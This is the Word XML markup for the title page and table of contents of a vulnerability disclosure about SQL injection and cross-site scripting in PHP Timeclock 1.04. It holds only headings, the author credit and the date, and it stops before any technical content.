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8F98" w14:textId="77777777" w:rsidR="00CA3D12" w:rsidRDefault="00CA3D12" w:rsidP="00CA3D12">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D7FE38D" w14:textId="09C507C6" w:rsidR="00CA3D12" w:rsidRDefault="00CA3D12" w:rsidP="00CA3D12">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66C7EB9A" w14:textId="1EA66763" w:rsidR="00B62992" w:rsidRDefault="00B62992" w:rsidP="00CA3D12">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70D8FEC7" w14:textId="4FB312E0" w:rsidR="00B62992" w:rsidRDefault="00B62992" w:rsidP="00CA3D12">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23E7FB83" w14:textId="15A885CB" w:rsidR="00B62992" w:rsidRDefault="00B62992" w:rsidP="00CA3D12">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D216EDF" w14:textId="77777777" w:rsidR="00B62992" w:rsidRDefault="00B62992" w:rsidP="00CA3D12">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="098C9594" w14:textId="77777777" w:rsidR="00CA3D12" w:rsidRDefault="00CA3D12" w:rsidP="00D52442">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5531FD64" w14:textId="1F139C79" w:rsidR="00A27AA1" w:rsidRDefault="00CA3D12" w:rsidP="00CA3D12">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002556E8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00346532">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>PHP Timeclock Vulnerability Disclosure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D4102D" w14:textId="6A651300" w:rsidR="00346532" w:rsidRPr="00346532" w:rsidRDefault="00346532" w:rsidP="00CA3D12">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00346532">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>SQL Injection and Cross Site Scripting on PHP Timeclock 1.04</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D2D2BE" w14:textId="6FFB48C9" w:rsidR="00CA3D12" w:rsidRDefault="00CA3D12" w:rsidP="00D52442">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AEA5E85" w14:textId="3C38F892" w:rsidR="00D52442" w:rsidRDefault="00D52442" w:rsidP="00D52442">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D7D866C" w14:textId="77777777" w:rsidR="00D52442" w:rsidRDefault="00D52442" w:rsidP="00D52442">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52ABAA71" w14:textId="5F16AF03" w:rsidR="00CA3D12" w:rsidRDefault="00CA3D12" w:rsidP="00CA3D12">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0444E7CD" w14:textId="627D518D" w:rsidR="00631F2B" w:rsidRDefault="00631F2B" w:rsidP="00CA3D12">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CAE8342" w14:textId="4DEE708A" w:rsidR="00631F2B" w:rsidRDefault="00631F2B" w:rsidP="00CA3D12">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F6037D2" w14:textId="394A5D63" w:rsidR="00631F2B" w:rsidRDefault="00631F2B" w:rsidP="00CA3D12">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74ED8098" w14:textId="77777777" w:rsidR="00631F2B" w:rsidRDefault="00631F2B" w:rsidP="00CA3D12">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C1D9CF2" w14:textId="6E677D74" w:rsidR="00CA3D12" w:rsidRPr="00CA3D12" w:rsidRDefault="00CA3D12" w:rsidP="00CA3D12">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA3D12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Tyler Butler </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1344C3DA" w14:textId="065B1A2F" w:rsidR="00CA3D12" w:rsidRPr="00CA3D12" w:rsidRDefault="00CA3D12" w:rsidP="00CA3D12">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA3D12">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Freelance Security Researcher </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70083B7D" w14:textId="06DF1004" w:rsidR="00CA3D12" w:rsidRDefault="00CA3D12" w:rsidP="00CA3D12">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="232936A1" w14:textId="428C024C" w:rsidR="00CA3D12" w:rsidRPr="00D52442" w:rsidRDefault="00CA3D12" w:rsidP="00D52442">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Friday, May 7</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA3D12">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, 2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6973840F" w14:textId="642600D7" w:rsidR="00CA3D12" w:rsidRDefault="00CA3D12" w:rsidP="00CA3D12"/>
    <w:p w14:paraId="20FB1F82" w14:textId="5CF48B2D" w:rsidR="00A52BF2" w:rsidRDefault="00A52BF2" w:rsidP="00CA3D12"/>
    <w:p w14:paraId="2C8C2C18" w14:textId="18845A08" w:rsidR="00A52BF2" w:rsidRDefault="00A52BF2" w:rsidP="00CA3D12"/>
    <w:p w14:paraId="287E990F" w14:textId="16243BD7" w:rsidR="00A52BF2" w:rsidRDefault="00A52BF2" w:rsidP="00CA3D12"/>
    <w:p w14:paraId="0718520B" w14:textId="2D3EB165" w:rsidR="0078027F" w:rsidRDefault="0078027F" w:rsidP="00CA3D12"/>
    <w:p w14:paraId="59284D47" w14:textId="7A29719C" w:rsidR="0078027F" w:rsidRDefault="0078027F" w:rsidP="00CA3D12"/>
    <w:p w14:paraId="22F85F31" w14:textId="2D689579" w:rsidR="0078027F" w:rsidRDefault="0078027F" w:rsidP="00CA3D12"/>
    <w:p w14:paraId="203AFF0D" w14:textId="12576320" w:rsidR="0078027F" w:rsidRDefault="0078027F" w:rsidP="00CA3D12"/>
    <w:p w14:paraId="3D828E74" w14:textId="549FCB16" w:rsidR="0078027F" w:rsidRDefault="0078027F" w:rsidP="00CA3D12"/>
    <w:p w14:paraId="113EE7C2" w14:textId="354DAC02" w:rsidR="0078027F" w:rsidRDefault="0078027F" w:rsidP="00CA3D12"/>
    <w:p w14:paraId="7FCC9AD8" w14:textId="675D53AB" w:rsidR="0078027F" w:rsidRDefault="0078027F" w:rsidP="00CA3D12"/>
    <w:p w14:paraId="462F5C87" w14:textId="21FD914B" w:rsidR="0078027F" w:rsidRDefault="0078027F" w:rsidP="00CA3D12"/>
    <w:p w14:paraId="1B6AA5A5" w14:textId="65615D84" w:rsidR="00CA3D12" w:rsidRDefault="00CA3D12" w:rsidP="00CA3D12"/>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:id w:val="-147987816"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="5CE727A9" w14:textId="5F0C72A6" w:rsidR="00986D61" w:rsidRDefault="00986D61">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
          <w:r>
            <w:t>Table of Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="6F0E783A" w14:textId="68FB0D41" w:rsidR="00333271" w:rsidRDefault="00986D61">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71209064" w:history="1">
            <w:r w:rsidR="00333271" w:rsidRPr="005B3CEA">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Preface</w:t>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71209064 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="19273652" w14:textId="1009323A" w:rsidR="00333271" w:rsidRDefault="00DD5500">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:caps w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71209065" w:history="1">
            <w:r w:rsidR="00333271" w:rsidRPr="005B3CEA">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Executive Summary</w:t>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71209065 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="105B94F9" w14:textId="36951F6A" w:rsidR="00333271" w:rsidRDefault="00DD5500">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:smallCaps w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71209066" w:history="1">
            <w:r w:rsidR="00333271" w:rsidRPr="005B3CEA">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Recommendations</w:t>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71209066 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="246EDC3E" w14:textId="058077B6" w:rsidR="00333271" w:rsidRDefault="00DD5500">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:caps w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71209067" w:history="1">
            <w:r w:rsidR="00333271" w:rsidRPr="005B3CEA">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Identified Vulnerabilities</w:t>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71209067 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4C03EA73" w14:textId="59B2D8C8" w:rsidR="00333271" w:rsidRDefault="00DD5500">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:smallCaps w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71209068" w:history="1">
            <w:r w:rsidR="00333271" w:rsidRPr="005B3CEA">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Unauthenticated Time and Boolean Based Blind SQL Injection via login.php</w:t>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71209068 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4D4612E5" w14:textId="011A31C2" w:rsidR="00333271" w:rsidRDefault="00DD5500">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:smallCaps w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71209069" w:history="1">
            <w:r w:rsidR="00333271" w:rsidRPr="005B3CEA">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Multiple Unauthenticated Reflective Cross-Site Scripting Vulnerabilities via Get Request</w:t>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71209069 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="144FC239" w14:textId="37FADE99" w:rsidR="00333271" w:rsidRDefault="00DD5500">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:smallCaps w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71209070" w:history="1">
            <w:r w:rsidR="00333271" w:rsidRPr="005B3CEA">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Multiple Authenticated Cross-Site Scripting Vulnerabilities via Post Parameters in Reporting Tools</w:t>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71209070 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="52DAAED1" w14:textId="091F2B14" w:rsidR="00333271" w:rsidRDefault="00DD5500">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:caps w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71209071" w:history="1">
            <w:r w:rsidR="00333271" w:rsidRPr="005B3CEA">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>A Note on the Use of Legacy Software</w:t>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71209071 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2A7164EA" w14:textId="010BE2C4" w:rsidR="00333271" w:rsidRDefault="00DD5500">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:smallCaps w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71209072" w:history="1">
            <w:r w:rsidR="00333271" w:rsidRPr="005B3CEA">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>PHP 5.3.3 Public Vulnerabilities</w:t>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71209072 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="00333271">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
